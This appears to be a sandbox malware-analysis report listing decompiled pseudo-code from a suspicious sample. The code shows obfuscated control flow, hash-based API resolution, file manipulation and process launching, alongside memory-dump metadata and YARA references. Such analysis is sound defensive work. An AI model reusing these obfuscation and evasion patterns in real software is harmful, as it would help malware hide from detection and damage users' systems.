Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID: hd@
API String ID: 2667261700-3469257913
Opcode ID: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction ID: 9ab521ae17bdcbf38e6808dd3f3d9ead1f2f8e9119152a2daa84f5c479dd3fff
Opcode Fuzzy Hash: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction Fuzzy Hash: C83181B1304709DFD7249F28EC89A2BB7E8FB44314B404A6EE892D3661D775F845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 021E7EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E021E7EC0() {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t91;
				void* _t93;
				intOrPtr* _t95;
				void* _t97;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr _t113;
				intOrPtr* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				char _t131;
				intOrPtr _t136;
				unsigned int _t150;
				void* _t153;
				void* _t160;
				void* _t161;
				signed int* _t162;
				void* _t164;

				_t162 =  &_v596;
				_v592 = 0x7beb;
				_t123 = 0x139d8b99;
				_v592 = _v592 | 0x6fda154b;
				_v592 = _v592 + 0xf6a9;
				_v592 = _v592 << 0x10;
				_v592 = _v592 + 0xffffa540;
				_v592 = _v592 ^ 0x7693a440;
				_v588 = 0xc2f;
				_v588 = _v588 << 0xb;
				_t122 = 0;
				_v588 = _v588 * 0x17;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x0008c1c9;
				_v584 = 0xfdf2;
				_v584 = _v584 << 7;
				_v584 = _v584 ^ 0x007ef903;
				_v596 = 0xe94a;
				_v596 = _v596 ^ 0xa24bbed7;
				_v596 = _v596 | 0x3a5f93cf;
				_t154 = _v596;
				_t161 = _v584;
				_v596 = (_v596 - (0x2c9fb4d9 * _t154 >> 0x20) >> 1) + (0x2c9fb4d9 * _t154 >> 0x20) >> 6;
				_v596 = _v596 | 0xa489ddc5;
				_v596 = _v596 + 0xf775;
				_t150 = 0x1b4e81b5 * _v596 >> 0x20 >> 3;
				_v596 = _t150;
				_v596 = _v596 ^ 0x0235bf01;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t164 = _t123 - 0x1e3debbe;
							if(_t164 > 0) {
								break;
							}
							if(_t164 == 0) {
								_t97 = E021E34C0(0x21ed910);
								_t150 =  *0x21edc60;
								_t160 = _t97;
								if(_t150 == 0) {
									_t150 = E021E3E80(_t122, E021E3F20(0xe66945e6), 0xcca28b0d, _t161);
									 *0x21edc60 = _t150;
								}
								_t136 =  *0x21ee2ec;
								 *_t150( &_v524, 0x104, _t160, _t136 + 0x5c, _t136 + 0x278);
								_t102 =  *0x21edea8;
								_t162 =  &(_t162[5]);
								if(_t102 == 0) {
									_t118 = E021E3F20(0xbb398380);
									_t150 = 0x97f883e;
									_t102 = E021E3E80(_t122, _t118, 0x97f883e, _t161);
									 *0x21edea8 = _t102;
								}
								_t153 =  *_t102();
								_t104 =  *0x21ee1a0;
								if(_t104 == 0) {
									_t117 = E021E3F20(0xbb398380);
									_t150 = 0x26c3f343;
									_t104 = E021E3E80(_t122, _t117, 0x26c3f343, _t161);
									 *0x21ee1a0 = _t104;
								}
								 *_t104(_t153, 0, _t160);
								_t123 = 0x2eb48bb5;
								goto L1;
							} else {
								if(_t123 == 0x390f515) {
									_v580 = 0xa8c00;
									_v576 = 0;
									_v596 = E021EB590(_v580, _v576, 0x989680, 0);
									_v592 = _t150;
									_v588 = _v588 - _v596;
									asm("sbb [esp+0x2c], ecx");
									_t123 = 0x1e3debbe;
									continue;
								} else {
									if(_t123 == 0x74c3147) {
										_t109 =  *0x21edc70;
										if(_t109 == 0) {
											_t109 = E021E3E80(_t122, E021E3F20(0xbb398380), 0x560d239b, _t161);
											 *0x21edc70 = _t109;
										}
										 *_t109(_t161);
										L34:
										return _t122;
									} else {
										if(_t123 != 0x139d8b99) {
											goto L22;
										} else {
											_t123 = 0x31fe4006;
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t123 == 0x2eb48bb5) {
							if( *0x21edfbc == 0) {
								_t93 = E021E3F20(0xbb398380);
								_t150 = 0xc0be2284;
								 *0x21edfbc = E021E3E80(_t122, _t93, 0xc0be2284, _t161);
							}
							_t91 = CreateFileW( &_v524, _v592, _v588, 0, _v584, _v596, 0); // executed
							_t161 = _t91;
							if(_t161 == 0xffffffff) {
								goto L34;
							} else {
								_t123 = 0x3a4d3f65;
								goto L2;
							}
						} else {
							if(_t123 == 0x31fe4006) {
								_t95 =  *0x21edfec;
								if(_t95 == 0) {
									_t121 = E021E3F20(0xbb398380);
									_t150 = 0xd4fa8936;
									_t95 = E021E3E80(_t122, _t121, 0xd4fa8936, _t161);
									 *0x21edfec = _t95;
								}
								 *_t95( &_v572);
								_t123 = 0x390f515;
								goto L2;
							} else {
								if(_t123 != 0x3a4d3f65) {
									goto L22;
								} else {
									_t113 = _v568;
									_t131 = _v572;
									_v560 = _t113;
									_v552 = _t113;
									_v544 = _t113;
									_v536 = _t113;
									_t114 =  *0x21edf54;
									_v564 = _t131;
									_v556 = _t131;
									_v548 = _t131;
									_v540 = _t131;
									_v532 = 0;
									if(_t114 == 0) {
										_t116 = E021E3F20(0xbb398380);
										_t150 = 0x3d270e76;
										_t114 = E021E3E80(_t122, _t116, 0x3d270e76, _t161);
										 *0x21edf54 = _t114;
									}
									 *_t114(_t161, 0,  &_v564, 0x28); // executed
									_t123 = 0x74c3147;
									_t122 =  !=  ? 1 : _t122;
									goto L2;
								}
							}
						}
						goto L35;
						L22:
					} while (_t123 != 0x21420c30);
					return _t122;
					goto L35;
				}
			}

0x021e7ec0
0x021e7eca
0x021e7ed2
0x021e7ed7
0x021e7edf
0x021e7ee7
0x021e7eec
0x021e7ef4
0x021e7efc
0x021e7f04
0x021e7f0e
0x021e7f10
0x021e7f19
0x021e7f1e
0x021e7f26
0x021e7f2e
0x021e7f33
0x021e7f3b
0x021e7f43
0x021e7f4b
0x021e7f53
0x021e7f59
0x021e7f6b
0x021e7f6f
0x021e7f77
0x021e7f85
0x021e7f88
0x021e7f8c
0x021e7f94
0x021e7f94
0x021e7f94
0x021e7fa0
0x021e7fa0
0x021e7fa0
0x021e7fa0
0x021e7fa6
0x00000000
0x00000000
0x021e7fac
0x021e801f
0x021e8024
0x021e802a
0x021e802e
0x021e8046
0x021e8048
0x021e8048
0x021e804e
0x021e806a
0x021e806c
0x021e8071
0x021e8076
0x021e807d
0x021e8082
0x021e8089
0x021e808e
0x021e808e
0x021e8095
0x021e8097
0x021e809e
0x021e80a5
0x021e80aa
0x021e80b1
0x021e80b6
0x021e80b6
0x021e80bf
0x021e80c1
0x00000000
0x021e7fae
0x021e7fb4
0x021e7fd7
0x021e7fdf
0x021e7ffb
0x021e7fff
0x021e800b
0x021e800f
0x021e8013
0x00000000
0x021e7fb6
0x021e7fbc
0x021e8200
0x021e8207
0x021e821a
0x021e821f
0x021e821f
0x021e8225
0x021e822a
0x021e8233
0x021e7fc2
0x021e7fc8
0x00000000
0x021e7fce
0x021e7fce
0x00000000
0x021e7fce
0x021e7fc8
0x021e7fbc
0x021e7fb4
0x00000000
0x021e7fac
0x021e80d1
0x021e81b0
0x021e81b7
0x021e81bc
0x021e81ca
0x021e81ca
0x021e81ed
0x021e81ef
0x021e81f4
0x00000000
0x021e81f6
0x021e81f6
0x00000000
0x021e81f6
0x021e80d7
0x021e80dd
0x021e8173
0x021e817a
0x021e8181
0x021e8186
0x021e818d
0x021e8192
0x021e8192
0x021e819c
0x021e819e
0x00000000
0x021e80e3
0x021e80e9
0x00000000
0x021e80eb
0x021e80eb
0x021e80ef
0x021e80f3
0x021e80f7
0x021e80fb
0x021e80ff
0x021e8103
0x021e8108
0x021e810c
0x021e8110
0x021e8114
0x021e8118
0x021e8122
0x021e8129
0x021e812e
0x021e8135
0x021e813a
0x021e813a
0x021e8149
0x021e814d
0x021e8152
0x00000000
0x021e8152
0x021e80e9
0x021e80dd
0x00000000
0x021e815a
0x021e815a
0x021e8172
0x00000000
0x021e8172

APIs

SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 021E8149
CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 021E81ED

Strings

Ei, xrefs: 021E8030
e?M:, xrefs: 021E81F6
{, xrefs: 021E7ECA
e?M:, xrefs: 021E80E3
J, xrefs: 021E7F3B

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: File$CreateHandleInformation
String ID: J$e?M:$e?M:$Ei${
API String ID: 3667790775-2299002149
Opcode ID: cdbea466ffbce75381aae00e278cf0cd2a155e9dd28a1c1a315bb1ec0dc28a0b
Instruction ID: f28897fac0ae8708bd001b4bc7eee52745c56b550b48bd38f22ea5e94bca2f58
Opcode Fuzzy Hash: cdbea466ffbce75381aae00e278cf0cd2a155e9dd28a1c1a315bb1ec0dc28a0b
Instruction Fuzzy Hash: 7B81D371A487019FDB18EF64AC9462BB6E6ABC4748F100D6DF467CB390DB70D9058B93

Uniqueness

Uniqueness Score: -1.00%

Function 004171BC, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004171BC(void* __ecx) {
				int _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t18 + 8)) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E00426041();
				} else {
					E00426011();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x004171c5
0x004171c9
0x004171cd
0x004171d6
0x004171d9
0x004171e2
0x004171db
0x004171db
0x004171db
0x004171f5
0x004171ff
0x00417207
0x00417213

APIs

KiUserCallbackDispatcher.NTDLL ref: 004171C9
GetSystemMetrics.USER32 ref: 004171D0
GetDC.USER32(00000000), ref: 004171E9
GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
ReleaseDC.USER32 ref: 0041720A

Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9

Uniqueness

Uniqueness Score: -1.00%

Function 021E30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E021E30D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x21eddd0;
									if(_t85 == 0) {
										_t85 = E021E3E80(_t76, E021E3F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x21eddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x21ee25c;
								if(_t90 == 0) {
									_t90 = E021E3E80(_t76, E021E3F20(0xbb398380), 0x5b27858b, _t102);
									 *0x21ee25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x21edea8;
									if(_t68 == 0) {
										_t68 = E021E3E80(_t76, E021E3F20(0xbb398380), 0x97f883e, _t102);
										 *0x21edea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x21edcec == 0) {
										 *0x21edcec = E021E3E80(_t76, E021E3F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E021E3D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x021e30d2
0x021e30d6
0x021e30dc
0x021e30e1
0x021e30e6
0x021e30ea
0x021e30ea
0x021e30f0
0x021e30f0
0x021e30f0
0x021e30f0
0x021e30f5
0x00000000
0x00000000
0x021e31b1
0x021e3226
0x021e322e
0x021e3233
0x021e323b
0x021e3240
0x021e3248
0x021e324d
0x021e3255
0x021e325a
0x021e3262
0x021e326a
0x021e326f
0x021e327c
0x021e3280
0x021e3285
0x021e328d
0x021e3292
0x021e329f
0x021e32a3
0x021e32a8
0x00000000
0x021e31b3
0x021e31b8
0x021e31ec
0x021e31f4
0x021e320c
0x021e320e
0x021e320e
0x021e321a
0x021e321c
0x021e30ea
0x021e30ea
0x00000000
0x021e30ea
0x021e31ba
0x021e31bf
0x00000000
0x021e31c1
0x021e31cc
0x00000000
0x021e31cc
0x021e31bf
0x021e31b8
0x00000000
0x021e31b1
0x021e30fb
0x021e319c
0x00000000
0x021e31a2
0x021e31a2
0x00000000
0x021e31a2
0x021e3101
0x021e3106
0x021e32b5
0x021e32bd
0x021e32d5
0x021e32d7
0x021e32d7
0x021e32ee
0x021e32f0
0x021e32f7
0x021e32fd
0x021e3300
0x00000000
0x021e310c
0x021e3111
0x021e312e
0x021e3135
0x021e3148
0x021e314d
0x021e314d
0x021e3154
0x021e315d
0x021e3175
0x021e3175
0x021e3182
0x021e3184
0x021e3188
0x021e3306
0x021e330d
0x021e318e
0x021e318e
0x00000000
0x021e318e
0x021e3113
0x021e3118
0x00000000
0x021e311e
0x021e3125
0x021e3127
0x021e30ea
0x021e30ea
0x00000000
0x021e30ea
0x021e30ea
0x021e3118
0x021e3111
0x021e3106
0x00000000
0x021e31d4
0x021e31d4
0x021e31e9
0x00000000
0x021e31e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 021E3182

Strings

B, xrefs: 021E3262
S=, xrefs: 021E3226
&, xrefs: 021E328D

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: dfe33085a1254c7b7bd02c608dd7d67b5fcdda7ac70aba89a5eee2812d2936e2
Instruction ID: 58b65abaf87478fa729a9e3f98c30eb78b6e9ebc20c04aa06132cb4bbbf41696
Opcode Fuzzy Hash: dfe33085a1254c7b7bd02c608dd7d67b5fcdda7ac70aba89a5eee2812d2936e2
Instruction Fuzzy Hash: 4951D572A447029BCF18DE689C8453BB7E6FBD0744F24489EF067CB250DB70DA858B92

Uniqueness

Uniqueness Score: -1.00%

Function 004080E7, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004080E7() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x43b634; // 0x1
				_t26 =  *0x43b624; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x43b638; // 0x21505a8
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x43b634 =  *0x43b634 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x43b624 =  *0x43b624 + 0x10;
				 *0x43b638 = _t25;
				_t15 =  *0x43b634; // 0x1
				goto L3;
			}

0x004080e7
0x004080ec
0x004080f8
0x0040812a
0x0040812a
0x00408140
0x00408143
0x0040814b
0x0040814e
0x0040817a
0x00000000
0x0040817a
0x0040815d
0x00408165
0x00408168
0x0040817e
0x00408182
0x00408184
0x00408187
0x00408190
0x00000000
0x00408193
0x00408174
0x00000000
0x00408174
0x004080fa
0x0040810f
0x00408117
0x00000000
0x00000000
0x00408119
0x00408120
0x00408125
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89

Uniqueness

Uniqueness Score: -1.00%

Function 021E4BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E021E4BA0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x21ee234;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E021E3E80(__ebx, E021E3F20(0xe66945e6), 0x8d9b356, __ebp);
					 *0x21ee234 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x21ede64 == 0) {
					 *0x21ede64 = E021E3E80(_t26, E021E3F20(0xbb398380), 0xcbbf9e7f, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x21edc70;
						if(_t15 == 0) {
							_t15 = E021E3E80(_t26, E021E3F20(0xbb398380), 0x560d239b, _t46);
							 *0x21edc70 = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x21edc70;
						if(_t17 == 0) {
							_t17 = E021E3E80(_t26, E021E3F20(0xbb398380), 0x560d239b, _t46);
							 *0x21edc70 = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x021e4ba0
0x021e4ba0
0x021e4ba0
0x021e4ba9
0x021e4bac
0x021e4bb0
0x021e4bc3
0x021e4bc8
0x021e4bc8
0x021e4bd6
0x021e4be0
0x021e4bea
0x021e4c02
0x021e4c02
0x021e4c21
0x021e4c25
0x021e4caa
0x021e4c27
0x021e4c2d
0x021e4c44
0x021e4c4b
0x021e4c5e
0x021e4c63
0x021e4c63
0x021e4c6c
0x021e4c6e
0x021e4c75
0x021e4c88
0x021e4c8d
0x021e4c8d
0x021e4c96
0x021e4ca2
0x021e4c2f
0x021e4c2f
0x021e4c35
0x021e4c43
0x021e4c43
0x021e4c2d

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 021E4C21

Strings

Ei, xrefs: 021E4BB2
D, xrefs: 021E4BE0

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D$Ei
API String ID: 963392458-592548167
Opcode ID: b1dfdf91d48c391d1a7743410333c9e87b6fd233b0643b508369d958050c5fc1
Instruction ID: f435f12de3ec5f4e739cf386b4e768a66a1169cb4cbc316e036368847028b6aa
Opcode Fuzzy Hash: b1dfdf91d48c391d1a7743410333c9e87b6fd233b0643b508369d958050c5fc1
Instruction Fuzzy Hash: 6021B435B80701AFDF14ABB8AC5077B37E6ABC0640F14485CF556CB280EF70D8458B92

Uniqueness

Uniqueness Score: -1.00%

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E00424BFB();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					_t10 =  &_a16; // 0x406468
					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
					E004264D7(_t18, _t31);
				}
				if( *((char*)(E00424BFB() + 0x14)) == 0) {
					E00412710();
				}
				_t20 = 1;
				return _t20;
			}

0x0042647d
0x00426484
0x00426486
0x0042648b
0x0042648f
0x00426492
0x0042649a
0x0042649d
0x0042649f
0x004264a5
0x004264a8
0x004264af
0x004264b2
0x004264b6
0x004264bb
0x004264bb
0x004264ca
0x004264cc
0x004264cc
0x004264d3
0x004264d4

APIs

